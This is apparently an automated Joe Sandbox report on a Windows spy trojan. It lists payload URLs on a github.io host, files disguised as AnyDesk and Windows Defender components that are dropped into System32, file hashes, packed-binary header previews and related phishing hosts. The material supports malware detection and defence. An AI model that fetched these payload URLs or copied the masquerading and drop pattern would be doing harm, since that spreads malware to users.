                          https://duy-thanh.github.io/file/AnyDeskCrashHandler.exenSecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe, 00000000.00000003.2163868483.0000027620A06000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            https://duy-thanh.github.io/file/MicrosoftWindowsDefenderCoreService.exevSecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe, 00000000.00000003.2163868483.0000027620A3D000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              https://duy-thanh.github.io/file/AnyDeskCrashHandler.exedllMicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2516843651.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2821679076.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2452545323.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                https://duy-thanh.github.io/file/AnyDeskUpdateService.exe3lMicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2762015507.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2388079438.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://duy-thanh.github.io/file/AnyDeskUpdateService.exeC:MicrosoftWindowsDefenderCoreService.exe, 00000011.00000002.3386441778.00000004C6DF9000.00000004.00000010.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://duy-thanh.github.io/file/version.txtb.io/file/AnyDeskCrashHandler.exeMicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.3381908245.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000002.3387008885.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://duy-thanh.github.io/file/version.txtXMicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2821679076.000001F7B17AC000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2516843651.000001F7B17AD000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2381038957.000001F7B17DA000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2388079438.000001F7B17B0000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2452545323.000001F7B17AD000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.3381908245.000001F7B179E000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2881888934.000001F7B17AD000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2642623988.000001F7B17AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://duy-thanh.github.io/file/AnyDeskCrashHandler.exetup%lMicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.3381908245.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000002.3387008885.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://duy-thanh.github.io/file/version.txt9c4a2f8b514.cdf-msMoMicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2381142881.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2388079438.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://duy-thanh.github.io/file/AnyDeskCrashHandler.exetupzMicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2762015507.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://duy-thanh.github.io/file/AnyDeskShellIntegration.dllzMicrosoftWindowsDefenderCoreService.exe, 00000011.00000002.3387008885.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://duy-thanh.github.io/file/version.txtC:MicrosoftWindowsDefenderCoreService.exe, 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000002.3386441778.00000004C6DF9000.00000004.00000010.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000002.3387459125.00007FF76E181000.00000040.00000001.01000000.00000006.sdmpfalse
                                                  		unknown
                                                  https://duy-thanh.github.io/file/AnyDeskShellIntegration.dll(lSecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe, 00000000.00000003.2163868483.0000027620A06000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://duy-thanh.github.io/file/version.txtb.io/file/version.txteService.exe3lMicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2943264967.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2881888934.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2821679076.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://duy-thanh.github.io/file/version.txte1MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2381038957.000001F7B17DA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://duy-thanh.github.io/file/version.txt.dllMicrosoftWindowsDefenderCoreService.exe, 00000011.00000002.3386691306.000001F7B1727000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://duy-thanh.github.io/file/AnyDeskShellIntegration.dllaoMicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2381142881.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2324213769.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2253907648.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://duy-thanh.github.io/file/AnyDeskSMicrosoftWindowsDefenderCoreService.exe, 00000011.00000002.3386441778.00000004C6DF9000.00000004.00000010.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://duy-thanh.github.io/file/AnyDeskUpdateService.exedf-msMoMicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2452545323.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://duy-thanh.github.io/file/AnyDeskCrashHandler.execdf-msMicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2943264967.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://duy-thanh.github.io/file/AnyDeskUpdateService.exemlMicrosoftWindowsDefenderCoreService.exe, 00000011.00000002.3387008885.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://duy-thanh.github.io/file/version.txt%lMicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2580698857.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://duy-thanh.github.io/file/AnyDeskShellIntegration.dll8lMicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.3381908245.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000002.3387008885.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2642623988.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2702146475.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://duy-thanh.github.io/file/version.txt8YMicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2702146475.000001F7B17AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://duy-thanh.github.io/file/AnyDeskUpdateService.exeupMicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2943264967.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2881888934.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            https://duy-thanh.github.io/file/version.txtb.io/file/version.txt3lMicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2381142881.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2324213769.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://duy-thanh.github.io/file/AnyDeskShellIntegration.dllhttps://duy-thanh.github.io/file/AnyDeskAnyDeskUpdateService.exe, 00000088.00000002.2580124899.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmpfalse
                                                                                		unknown
                                                                                https://duy-thanh.github.io/file/AnyDeskShellIntegration.dllRo-MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2381142881.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2943264967.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2324213769.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2762015507.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2253907648.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.3381908245.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2516843651.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2580698857.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000002.3387008885.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2642623988.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2702146475.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2881888934.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2821679076.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2452545323.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2388079438.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://duy-thanh.github.io/file/AnyDeskCrashHandler.exeySecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe, 00000000.00000003.2163868483.0000027620A3D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    https://duy-thanh.github.io/file/AnyDeskShellIntegration.dllmsmlMicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2943264967.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      https://duy-thanh.github.io/file/AnyDeskShellIntegratPAnyDeskUpdateService.exe, 00000020.00000002.3386537801.0000009561CFD000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        https://duy-thanh.github.io/file/version.txttMicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2762015507.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2516843651.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2821679076.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          https://duy-thanh.github.io/SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe, 00000000.00000002.2170001507.00000276209D5000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe, 00000000.00000003.2163868483.0000027620A3D000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2381038957.000001F7B17DA000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000002.3386691306.000001F7B1727000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            https://duy-thanh.github.io/file/AnyDeskCrashHandler.exezMicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2762015507.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2642623988.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2702146475.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              https://duy-thanh.github.io/file/AnyDeskShellIntegratLAnyDeskUpdateService.exe, 00000020.00000002.3385629324.0000009560FAC000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                https://duy-thanh.github.io/file/version.txtrMicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2762015507.000001F7B17AD000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2324213769.000001F7B17B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  https://duy-thanh.github.io/file/AnyDeskCrashHandler.exetupMicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2516843651.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2388079438.000001F7B17E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		unknown

                                                                                                    World Map of Contacted IPs

                                                                                                    • No. of IPs < 25%
                                                                                                    • 25% < No. of IPs < 50%
                                                                                                    • 50% < No. of IPs < 75%
                                                                                                    • 75% < No. of IPs

                                                                                                    Public IPs

                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                    185.199.110.153
                                                                                                    		duy-thanh.github.ioNetherlands
                                                                                                    		54113FASTLYUSfalse

                                                                                                    General Information

                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                    Analysis ID:1521703
                                                                                                    Start date and time:2024-09-29 02:25:07 +02:00
                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                    Overall analysis duration:0h 8m 48s
                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                    Report type:full
                                                                                                    Cookbook file name:default.jbs
                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                    Number of analysed new started processes analysed:283
                                                                                                    Number of new started drivers analysed:0
                                                                                                    Number of existing processes analysed:0
                                                                                                    Number of existing drivers analysed:0
                                                                                                    Number of injected processes analysed:0
                                                                                                    Technologies:
                                                                                                    • HCA enabled
                                                                                                    • EGA enabled
                                                                                                    • AMSI enabled
                                                                                                    Analysis Mode:default
                                                                                                    Analysis stop reason:Timeout
                                                                                                    Sample name:SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe
                                                                                                    Detection:MAL
                                                                                                    Classification:mal76.evad.winEXE@545/20@1/1
                                                                                                    EGA Information:
                                                                                                    • Successful, ratio: 100%
                                                                                                    HCA Information:
                                                                                                    • Successful, ratio: 95%
                                                                                                    • Number of executed functions: 55
                                                                                                    • Number of non-executed functions: 207
                                                                                                    Cookbook Comments:
                                                                                                    • Found application associated with file extension: .exe

                                                                                                    Warnings

                                                                                                    • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                    • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                    • VT rate limit hit for: SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe

                                                                                                    Simulations

                                                                                                    Behavior and APIs

                                                                                                    TimeTypeDescription
                                                                                                    20:26:47API Interceptor169422x Sleep call for process: AnyDeskCrashHandler.exe modified
                                                                                                    20:26:51API Interceptor370x Sleep call for process: AnyDeskUpdateService.exe modified

                                                                                                    Joe Sandbox View / Context

                                                                                                    IPs

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    185.199.110.153http://bankmallat.github.io/Get hashmaliciousUnknownBrowse
                                                                                                    • bankmallat.github.io/
                                                                                                    http://mallika1618.github.io/project1Get hashmaliciousHTMLPhisherBrowse
                                                                                                    • mallika1618.github.io/project1
                                                                                                    http://unusualactivityaccountpages12.github.io/Get hashmaliciousHTMLPhisherBrowse
                                                                                                    • unusualactivityaccountpages12.github.io/
                                                                                                    http://steephan2003.github.io/Get hashmaliciousHTMLPhisherBrowse
                                                                                                    • steephan2003.github.io/
                                                                                                    http://facebook-web-cloud.github.io/Get hashmaliciousHTMLPhisherBrowse
                                                                                                    • facebook-web-cloud.github.io/
                                                                                                    http://unusualmanagementaccount.github.io/Get hashmaliciousHTMLPhisherBrowse
                                                                                                    • unusualmanagementaccount.github.io/
                                                                                                    http://document001.github.io/Get hashmaliciousHTMLPhisherBrowse
                                                                                                    • document001.github.io/
                                                                                                    http://vamsirednam.github.io/NetflixGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • vamsirednam.github.io/Netflix
                                                                                                    http://sreekanthv1995.github.io/netflix_cloneGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • sreekanthv1995.github.io/netflix_clone
                                                                                                    http://steveidiot.github.io/BharatIntern-WebDevelopment-HomepageOfNetflixGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • steveidiot.github.io/BharatIntern-WebDevelopment-HomepageOfNetflix

                                                                                                    Domains

                                                                                                    No context

                                                                                                    ASNs

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    FASTLYUShttp://pub-ca8a3ace07094ee9967971c12a96a935.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • 151.101.194.137
                                                                                                    https://shahbazni.github.io/re-verify-yourself-profile/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • 185.199.108.153
                                                                                                    http://pub-5c11a91a55864f9b9bf45b1c581d6d73.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • 185.199.108.153
                                                                                                    http://yhusbssgsuh.wixsite.com/my-siteGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • 199.232.188.157
                                                                                                    http://pub-6f594b43277e4071a0c14266387a1ea8.r2.dev/fdsaghjk.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • 151.101.194.137
                                                                                                    https://jesswhiteus.github.io/Awais-link/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • 185.199.111.153
                                                                                                    http://pub-39ac7434165d45eda536266ee7865b38.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • 151.101.66.137
                                                                                                    http://pub-350a846a0e7e4389a5b4fd3d333108f4.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • 151.101.194.137
                                                                                                    http://ingresar-aqui1201.weebly.com/Get hashmaliciousUnknownBrowse
                                                                                                    • 151.101.129.49
                                                                                                    http://cancelarpedidoaqui003.weebly.com/Get hashmaliciousUnknownBrowse
                                                                                                    • 199.232.188.157

                                                                                                    JA3 Fingerprints

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    37f463bf4616ecd445d4a1937da06e19app__v7.1.7_.msiGet hashmaliciousUnknownBrowse
                                                                                                    • 185.199.110.153
                                                                                                    file.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, PrivateLoader, Socks5SystemzBrowse
                                                                                                    • 185.199.110.153
                                                                                                    file.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                    • 185.199.110.153
                                                                                                    file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                    • 185.199.110.153
                                                                                                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                    • 185.199.110.153
                                                                                                    file.exeGet hashmaliciousVidarBrowse
                                                                                                    • 185.199.110.153
                                                                                                    file.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, Socks5SystemzBrowse
                                                                                                    • 185.199.110.153
                                                                                                    CpMQGUserR.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 185.199.110.153
                                                                                                    Installer.msiGet hashmaliciousUnknownBrowse
                                                                                                    • 185.199.110.153
                                                                                                    CpMQGUserR.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 185.199.110.153

                                                                                                    Dropped Files

                                                                                                    No context

                                                                                                    Created / dropped Files

                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\MicrosoftWindowsDefenderCoreService[1].exe

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe
                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):143872
                                                                                                    Entropy (8bit):7.873862373980263
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:3fTw5T+B1/TPchSZzA5+fOZmaIJhWLQkD7V2EO0EnGfz9:3U5T+B1LkhSROZmRQLQkDRPEG
                                                                                                    MD5:9CEBC167FF7C8AE3CCFFB718FD7B52D0
                                                                                                    SHA1:8F5FA44298E5498D1CA696DC909093E26F4B5661
                                                                                                    SHA-256:EA5CD105B600E7606DE1CBCFE813A7845A3BE878B1E85DBC686871356FAAAC29
                                                                                                    SHA-512:CED1F79DD967CBBFEA8D08768EEBD8BD1B319B6EE5726BCF097AE375001DBF86C9A703CE7821468351CCC453C261598C6AC69EB9EB2420E72C3BDD33C3E57C5D
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 42%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........7..od..od..od..le..od..je..od..ke..od..le..od..ke..od..je.od..ne..od..nd.od..fe..od...d..od...d..od..me..odRich..od........................PE..d...]..f.........."....).0...........!.........@.............................@............`................................................. 6..\....0.. ........&..........|7.......................................$..@...........................................UPX0....................................UPX1.....0.......&..................@....rsrc........0.......*..............@..............................................................................................................................................................................................................................................................................................................................................4.00.UPX!.$..

                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\AnyDeskShellIntegration[1].dll

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):54784
                                                                                                    Entropy (8bit):7.75347884612182
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:L3Yoj7FMTP8V98VHTXVAwkyUdUdTKtouDSeO6CfdRPGj6o8aCA:jYoj7FMTQ98VHTmwF7NKmueeCfHPGm6
                                                                                                    MD5:6E948E7425A1693B64951A8EB2A846C7
                                                                                                    SHA1:D12B91D1CFA5CEFC1EFE917F1B893BCCD1210896
                                                                                                    SHA-256:6D7DF6C7605316BE49804840649D26FF1FBD2F9208A0330EF87247920EDB93FE
                                                                                                    SHA-512:0DCCCB38E919A345DABEE0F40FCF526239EA6D3F4289FC16F5BF6C2BF73A5B564D643BCC522BB63B97E574F59D732640AFD8F20A98BCBDD10F2368E515BF8D3B
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......tn.e0.s60.s60.s6{wp75.s6{wv7..s6{ww7:.s6 .p79.s6 .w7>.s6 .v7..s6{wr73.s60.r6i.s6x.z72.s6x..61.s60..61.s6x.q71.s6Rich0.s6........PE..d...<..f.........." ...)......... .......0................................................`.........................................................................................................................8...@...........................................UPX0..... ..............................UPX1.........0......................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................................4.00.UPX!.$..

                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\AnyDeskCrashHandler[1].exe

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe
                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60416
                                                                                                    Entropy (8bit):7.756024662478089
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:td3pwkJ+vSKrCdQN8ZAO/IYeBcWCgTumOC9N9b:TpwkAEQN8ZAOAYs2gTumOCJ
                                                                                                    MD5:8EB4565C6C7096C17AC94718B2A3724B
                                                                                                    SHA1:1BCEC351F712F041E4B23545E9A14C421EFFCFD3
                                                                                                    SHA-256:C700DC3BB675FB60DD69D26ED9628616C97B64AF7FAAEFF92F6C65E7F4F2B8FE
                                                                                                    SHA-512:5BA97CE8B19EFA125EFB40AAE9B1E1C9FB6A7E45B9261BD8327988C8C5474A5E27AACE3E0CA77A0767740CAEB7BF2060490DC77DEBA7EEE474F6F3A998B1F0A6
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 29%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................................?..........g.....g.....g....................f......f......F.....f.....Rich....................PE..d...y..f.........."....).........P...:...`.....@.............................P............`.................................................@E.......@..@.......\........... F.......................................<..@...........................................UPX0.....P..............................UPX1.........`......................@....rsrc........@......................@......................................................................................................................................................................................................................................................................................................................................................4.00.UPX!.$..

                                                                                                    C:\Windows\System32\AnyDeskShellIntegration.dll

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):54784
                                                                                                    Entropy (8bit):7.75347884612182
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:L3Yoj7FMTP8V98VHTXVAwkyUdUdTKtouDSeO6CfdRPGj6o8aCA:jYoj7FMTQ98VHTmwF7NKmueeCfHPGm6
                                                                                                    MD5:6E948E7425A1693B64951A8EB2A846C7
                                                                                                    SHA1:D12B91D1CFA5CEFC1EFE917F1B893BCCD1210896
                                                                                                    SHA-256:6D7DF6C7605316BE49804840649D26FF1FBD2F9208A0330EF87247920EDB93FE
                                                                                                    SHA-512:0DCCCB38E919A345DABEE0F40FCF526239EA6D3F4289FC16F5BF6C2BF73A5B564D643BCC522BB63B97E574F59D732640AFD8F20A98BCBDD10F2368E515BF8D3B
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......tn.e0.s60.s60.s6{wp75.s6{wv7..s6{ww7:.s6 .p79.s6 .w7>.s6 .v7..s6{wr73.s60.r6i.s6x.z72.s6x..61.s60..61.s6x.q71.s6Rich0.s6........PE..d...<..f.........." ...)......... .......0................................................`.........................................................................................................................8...@...........................................UPX0..... ..............................UPX1.........0......................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................................4.00.UPX!.$..

                                                                                                    C:\Windows\System32\AnyDeskShellIntegration_Update.dll

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):54784
                                                                                                    Entropy (8bit):7.75347884612182
                                                                                                    Encrypted:false
